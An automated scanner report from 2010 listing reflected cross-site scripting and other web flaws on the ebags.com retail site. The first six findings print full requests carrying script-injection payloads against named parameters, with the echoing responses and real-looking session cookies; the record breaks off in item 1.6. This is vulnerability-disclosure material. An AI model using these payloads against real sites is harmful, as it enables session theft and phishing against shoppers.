ebags.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Cross Site Scripting in ebags.com | Vulnerability Crawler Report

Report generated by XSS.CX at Mon Dec 27 10:36:19 CST 2010.


Contents

1. Cross-site scripting (reflected)


Contents

Loading

1.1. http://www.ebags.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.ebags.com/brands/index.cfm [name of an arbitrarily supplied request parameter]

1.3. http://www.ebags.com/brands/index.cfm [sub_site_id parameter]

1.4. http://www.ebags.com/help/ [name of an arbitrarily supplied request parameter]

1.5. http://www.ebags.com/help/index.cfm [HelpCenter_Link parameter]

1.6. http://www.ebags.com/help/index.cfm [name of an arbitrarily supplied request parameter]

1.7. http://www.ebags.com/members/index.cfm [name of an arbitrarily supplied request parameter]

1.8. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [&sourceID parameter]

1.9. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [name of an arbitrarily supplied request parameter]

1.10. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [name of an arbitrarily supplied request parameter]

1.11. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [productid parameter]

1.12. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [sourceID parameter]

1.13. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [testimonialsortlink parameter]

1.14. http://www.ebags.com/products/index.cfm [modelid parameter]

1.15. http://www.ebags.com/products/index.cfm [productid parameter]

1.16. http://www.ebags.com/products/index.cfm [quicksignlink parameter]

1.17. http://www.ebags.com/products/index.cfm [sourceid parameter]

1.18. http://www.ebags.com/rewards/index.cfm [fuseaction parameter]

1.19. http://www.ebags.com/rewards/index.cfm [name of an arbitrarily supplied request parameter]

1.20. http://www.ebags.com/shoppingcart/index.cfm [CurrentTime parameter]

1.21. http://www.ebags.com/shoppingcart/index.cfm [itemAdded parameter]

1.22. http://www.ebags.com/shoppingcart/index.cfm [name of an arbitrarily supplied request parameter]

1.23. http://www.ebags.com/shoppingcart/index.cfm [requesttimeout parameter]

1.24. http://www.ebags.com/ [SPLITSESSION cookie]

1.25. http://www.ebags.com/blocks/dsp_non_discountable_brands.cfm [SPLITSESSION cookie]

1.26. http://www.ebags.com/blocks/dsp_prop65.cfm [SPLITSESSION cookie]

1.27. http://www.ebags.com/brand/athalon [SPLITSESSION cookie]

1.28. http://www.ebags.com/brand/bosca [SPLITSESSION cookie]

1.29. http://www.ebags.com/brand/burton [SPLITSESSION cookie]

1.30. http://www.ebags.com/brand/eagle-creek [SPLITSESSION cookie]

1.31. http://www.ebags.com/brand/fleurville [SPLITSESSION cookie]

1.32. http://www.ebags.com/brand/hobo-international [SPLITSESSION cookie]

1.33. http://www.ebags.com/brand/hurley [SPLITSESSION cookie]

1.34. http://www.ebags.com/brand/ju-ju-be [SPLITSESSION cookie]

1.35. http://www.ebags.com/brand/kalencom [SPLITSESSION cookie]

1.36. http://www.ebags.com/brand/lego [SPLITSESSION cookie]

1.37. http://www.ebags.com/brand/lodis [SPLITSESSION cookie]

1.38. http://www.ebags.com/brand/michael-michael-kors-watches [SPLITSESSION cookie]

1.39. http://www.ebags.com/brand/quiksilver [SPLITSESSION cookie]

1.40. http://www.ebags.com/brand/timi-and-leslie [SPLITSESSION cookie]

1.41. http://www.ebags.com/brands/department/index.cfm [SPLITSESSION cookie]

1.42. http://www.ebags.com/brands/index.cfm [SPLITSESSION cookie]

1.43. http://www.ebags.com/category/backpack-handbags/20036676 [SPLITSESSION cookie]

1.44. http://www.ebags.com/category/clutches/20036679 [SPLITSESSION cookie]

1.45. http://www.ebags.com/category/clutches/20048616 [SPLITSESSION cookie]

1.46. http://www.ebags.com/category/cross-body-bags/20037212 [SPLITSESSION cookie]

1.47. http://www.ebags.com/category/handbags/10014 [SPLITSESSION cookie]

1.48. http://www.ebags.com/category/handbags/10014/h/sale [SPLITSESSION cookie]

1.49. http://www.ebags.com/category/hobos/20036674 [SPLITSESSION cookie]

1.50. http://www.ebags.com/category/hobos/20048614 [SPLITSESSION cookie]

1.51. http://www.ebags.com/department/backpacks [SPLITSESSION cookie]

1.52. http://www.ebags.com/department/bags-by-ebags [SPLITSESSION cookie]

1.53. http://www.ebags.com/department/business-and-laptop [SPLITSESSION cookie]

1.54. http://www.ebags.com/department/designer-handbags [SPLITSESSION cookie]

1.55. http://www.ebags.com/department/handbags [SPLITSESSION cookie]

1.56. http://www.ebags.com/department/kids-and-baby [SPLITSESSION cookie]

1.57. http://www.ebags.com/department/luggage [SPLITSESSION cookie]

1.58. http://www.ebags.com/department/messenger-bags [SPLITSESSION cookie]

1.59. http://www.ebags.com/department/sale [SPLITSESSION cookie]

1.60. http://www.ebags.com/department/snow-and-skate [SPLITSESSION cookie]

1.61. http://www.ebags.com/department/sports-and-duffels [SPLITSESSION cookie]

1.62. http://www.ebags.com/department/travel-accessories [SPLITSESSION cookie]

1.63. http://www.ebags.com/department/wallets-and-accessories [SPLITSESSION cookie]

1.64. http://www.ebags.com/help/ [SPLITSESSION cookie]

1.65. http://www.ebags.com/help/index.cfm [SPLITSESSION cookie]

1.66. http://www.ebags.com/info/Compare/index.cfm [SPLITSESSION cookie]

1.67. http://www.ebags.com/info/Compare/index.cfm [SPLITSESSION cookie]

1.68. http://www.ebags.com/members/index.cfm [SPLITSESSION cookie]

1.69. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830 [SPLITSESSION cookie]

1.70. http://www.ebags.com/products/index.cfm [SPLITSESSION cookie]

1.71. http://www.ebags.com/products/view/ZoomColorsViews.cfm [SPLITSESSION cookie]

1.72. http://www.ebags.com/rewards/index.cfm [SPLITSESSION cookie]

1.73. http://www.ebags.com/shoppingcart/index.cfm [SPLITSESSION cookie]

1.74. http://www.ebags.com/travel_accessories/car_travel_accessories/category_search/index.cfm [SPLITSESSION cookie]

1.75. http://www.ebags.com/travel_accessories/car_travel_accessories/category_search/index.cfm [SPLITSESSION cookie]

1.76. http://www.ebags.com/travel_accessories/department/index.cfm [SPLITSESSION cookie]

1.77. http://www.ebags.com/travel_accessories/travel_electronics_cases/category_search/index.cfm [SPLITSESSION cookie]

1.78. http://www.ebags.com/travel_accessories/travel_electronics_cases/category_search/index.cfm [SPLITSESSION cookie]

2. Cookie scoped to parent domain

3. Cookie without HttpOnly flag set

3.1. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830

3.2. http://www.ebags.com/

3.3. http://www.ebags.com/blocks/ajax/certonaajax.cfm

3.4. http://www.ebags.com/blocks/ajax/persistentCart.cfm

3.5. http://www.ebags.com/blocks/ajax/productEDD.cfm

3.6. http://www.ebags.com/blocks/dsp_non_discountable_brands.cfm

3.7. http://www.ebags.com/blocks/dsp_prop65.cfm

3.8. http://www.ebags.com/brand/athalon

3.9. http://www.ebags.com/brand/bosca

3.10. http://www.ebags.com/brand/burton

3.11. http://www.ebags.com/brand/eagle-creek

3.12. http://www.ebags.com/brand/fleurville

3.13. http://www.ebags.com/brand/hobo-international

3.14. http://www.ebags.com/brand/hurley

3.15. http://www.ebags.com/brand/ju-ju-be

3.16. http://www.ebags.com/brand/kalencom

3.17. http://www.ebags.com/brand/lego

3.18. http://www.ebags.com/brand/lodis

3.19. http://www.ebags.com/brand/michael-michael-kors-watches

3.20. http://www.ebags.com/brand/quiksilver

3.21. http://www.ebags.com/brand/timi-and-leslie

3.22. http://www.ebags.com/brands/index.cfm

3.23. http://www.ebags.com/category/backpack-handbags/20036676

3.24. http://www.ebags.com/category/carry-on-luggage/20048891

3.25. http://www.ebags.com/category/clutches/20036679

3.26. http://www.ebags.com/category/clutches/20048616

3.27. http://www.ebags.com/category/cross-body-bags/20037212

3.28. http://www.ebags.com/category/handbags/10014

3.29. http://www.ebags.com/category/handbags/10014/h/sale

3.30. http://www.ebags.com/category/hobos/20036674

3.31. http://www.ebags.com/category/hobos/20048614

3.32. http://www.ebags.com/category/travel-accessories/20014443

3.33. http://www.ebags.com/department/backpacks

3.34. http://www.ebags.com/department/bags-by-ebags

3.35. http://www.ebags.com/department/business-and-laptop

3.36. http://www.ebags.com/department/designer-handbags

3.37. http://www.ebags.com/department/handbags

3.38. http://www.ebags.com/department/kids-and-baby

3.39. http://www.ebags.com/department/luggage

3.40. http://www.ebags.com/department/messenger-bags

3.41. http://www.ebags.com/department/sale

3.42. http://www.ebags.com/department/snow-and-skate

3.43. http://www.ebags.com/department/sports-and-duffels

3.44. http://www.ebags.com/department/travel-accessories

3.45. http://www.ebags.com/department/wallets-and-accessories

3.46. http://www.ebags.com/help/

3.47. http://www.ebags.com/help/index.cfm

3.48. http://www.ebags.com/info/Compare/index.cfm

3.49. http://www.ebags.com/info/index.cfm

3.50. http://www.ebags.com/info/ratings/index.cfm

3.51. http://www.ebags.com/members/index.cfm

3.52. http://www.ebags.com/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617

3.53. http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538

3.54. http://www.ebags.com/products/index.cfm

3.55. http://www.ebags.com/products/view/ZoomColorsViews.cfm

3.56. http://www.ebags.com/rewards/index.cfm

3.57. http://www.ebags.com/shoppingcart/index.cfm

3.58. http://www.ebags.com/travel_accessories/car_travel_accessories/category_search/index.cfm

3.59. http://www.ebags.com/travel_accessories/travel_electronics_cases/category_search/index.cfm

4. Cross-domain Referer leakage

4.1. http://www.ebags.com/blocks/ajax/certonaajax.cfm

4.2. http://www.ebags.com/blocks/ajax/persistentCart.cfm

4.3. http://www.ebags.com/brands/index.cfm

4.4. http://www.ebags.com/category/travel-accessories/20014443

4.5. http://www.ebags.com/help/index.cfm

4.6. http://www.ebags.com/help/index.cfm

4.7. http://www.ebags.com/info/Compare/index.cfm

4.8. http://www.ebags.com/info/index.cfm

4.9. http://www.ebags.com/info/index.cfm

4.10. http://www.ebags.com/info/index.cfm

4.11. http://www.ebags.com/members/index.cfm

4.12. http://www.ebags.com/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617

4.13. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830

4.14. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830

4.15. http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538

4.16. http://www.ebags.com/products/view/ZoomColorsViews.cfm

4.17. http://www.ebags.com/rewards/index.cfm

4.18. http://www.ebags.com/shoppingcart/index.cfm

4.19. http://www.ebags.com/shoppingcart/index.cfm

4.20. http://www.ebags.com/shoppingcart/index.cfm

5. Cross-domain script include

5.1. http://www.ebags.com/

5.2. http://www.ebags.com/blocks/ajax/helppop-up.cfm

5.3. http://www.ebags.com/brand/bosca

5.4. http://www.ebags.com/brand/burton

5.5. http://www.ebags.com/brand/eagle-creek

5.6. http://www.ebags.com/brand/fleurville

5.7. http://www.ebags.com/brand/hobo-international

5.8. http://www.ebags.com/brand/hurley

5.9. http://www.ebags.com/brand/ju-ju-be

5.10. http://www.ebags.com/brand/kalencom

5.11. http://www.ebags.com/brand/lego

5.12. http://www.ebags.com/brand/lodis

5.13. http://www.ebags.com/brand/michael-michael-kors-watches

5.14. http://www.ebags.com/brand/quiksilver

5.15. http://www.ebags.com/brand/timi-and-leslie

5.16. http://www.ebags.com/brands/index.cfm

5.17. http://www.ebags.com/category/backpack-handbags/20036676

5.18. http://www.ebags.com/category/carry-on-luggage/20048891

5.19. http://www.ebags.com/category/clutches/20036679

5.20. http://www.ebags.com/category/clutches/20048616

5.21. http://www.ebags.com/category/cross-body-bags/20037212

5.22. http://www.ebags.com/category/handbags/10014

5.23. http://www.ebags.com/category/handbags/10014/h/sale

5.24. http://www.ebags.com/category/hobos/20036674

5.25. http://www.ebags.com/category/hobos/20048614

5.26. http://www.ebags.com/category/travel-accessories/20014443

5.27. http://www.ebags.com/department/backpacks

5.28. http://www.ebags.com/department/bags-by-ebags

5.29. http://www.ebags.com/department/business-and-laptop

5.30. http://www.ebags.com/department/designer-handbags

5.31. http://www.ebags.com/department/handbags

5.32. http://www.ebags.com/department/kids-and-baby

5.33. http://www.ebags.com/department/luggage

5.34. http://www.ebags.com/department/messenger-bags

5.35. http://www.ebags.com/department/sale

5.36. http://www.ebags.com/department/snow-and-skate

5.37. http://www.ebags.com/department/sports-and-duffels

5.38. http://www.ebags.com/department/travel-accessories

5.39. http://www.ebags.com/department/wallets-and-accessories

5.40. http://www.ebags.com/help/

5.41. http://www.ebags.com/help/index.cfm

5.42. http://www.ebags.com/info/Compare/index.cfm

5.43. http://www.ebags.com/info/index.cfm

5.44. http://www.ebags.com/members/index.cfm

5.45. http://www.ebags.com/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617

5.46. http://www.ebags.com/product/case-logic/sony-psp-game-case/120830

5.47. http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538

5.48. http://www.ebags.com/rewards/index.cfm

5.49. http://www.ebags.com/shoppingcart/index.cfm

5.50. http://www.ebags.com/travel_accessories/car_travel_accessories/category_search/index.cfm

5.51. http://www.ebags.com/travel_accessories/travel_electronics_cases/category_search/index.cfm

6. Email addresses disclosed

6.1. http://www.ebags.com/info/index.cfm

6.2. http://www.ebags.com/products/view/ZoomColorsViews.cfm

7. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 78 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.ebags.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31c8f"><script>alert(1)</script>d599cc43ed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?31c8f"><script>alert(1)</script>d599cc43ed4=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:08 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:04:08 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 75114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/index.cfm?31c8f"><script>alert(1)</script>d599cc43ed4=1&quicksignlink=pageend">
...[SNIP]...

1.2. http://www.ebags.com/brands/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brands/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 517fa"><script>alert(1)</script>c9c47396fe9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/index.cfm?517fa"><script>alert(1)</script>c9c47396fe9=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:56 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:56 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 280296


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/brands/index.cfm?517fa"><script>alert(1)</script>c9c47396fe9=1&quicksignlink=pageend">
...[SNIP]...

1.3. http://www.ebags.com/brands/index.cfm [sub_site_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brands/index.cfm

Issue detail

The value of the sub_site_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 923c4"><script>alert(1)</script>1dc246df464 was submitted in the sub_site_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /brands/index.cfm?sub_site_id=49923c4"><script>alert(1)</script>1dc246df464 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:00 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:00 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 43301


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/brands/index.cfm?sub_site_id=49923c4"><script>alert(1)</script>1dc246df464&quicksignlink=pageend">
...[SNIP]...

1.4. http://www.ebags.com/help/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /help/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e296c"><script>alert(1)</script>1333b400c65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /help/?e296c"><script>alert(1)</script>1333b400c65=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:05:27 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:05:27 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 47241


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/help/index.cfm?e296c"><script>alert(1)</script>1333b400c65=1&quicksignlink=pageend">
...[SNIP]...

1.5. http://www.ebags.com/help/index.cfm [HelpCenter_Link parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /help/index.cfm

Issue detail

The value of the HelpCenter_Link request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81f28"><script>alert(1)</script>552f3115918 was submitted in the HelpCenter_Link parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /help/index.cfm?fuseaction=suggest&HelpCenter_Link=Suggestions81f28"><script>alert(1)</script>552f3115918 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:05:38 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:05:38 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 45466


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
<input type="Hidden" name="destination" value="http://www.ebags.com/help/index.cfm?fuseaction=suggest&HelpCenter_Link=Suggestions81f28"><script>alert(1)</script>552f3115918&quicksignlink=pageend">
...[SNIP]...

1.6. http://www.ebags.com/help/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /help/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43aea"><script>alert(1)</script>e2a6fc36772 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /help/index.cfm?43aea"><script>alert(1)</script>e2a6fc36772=1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
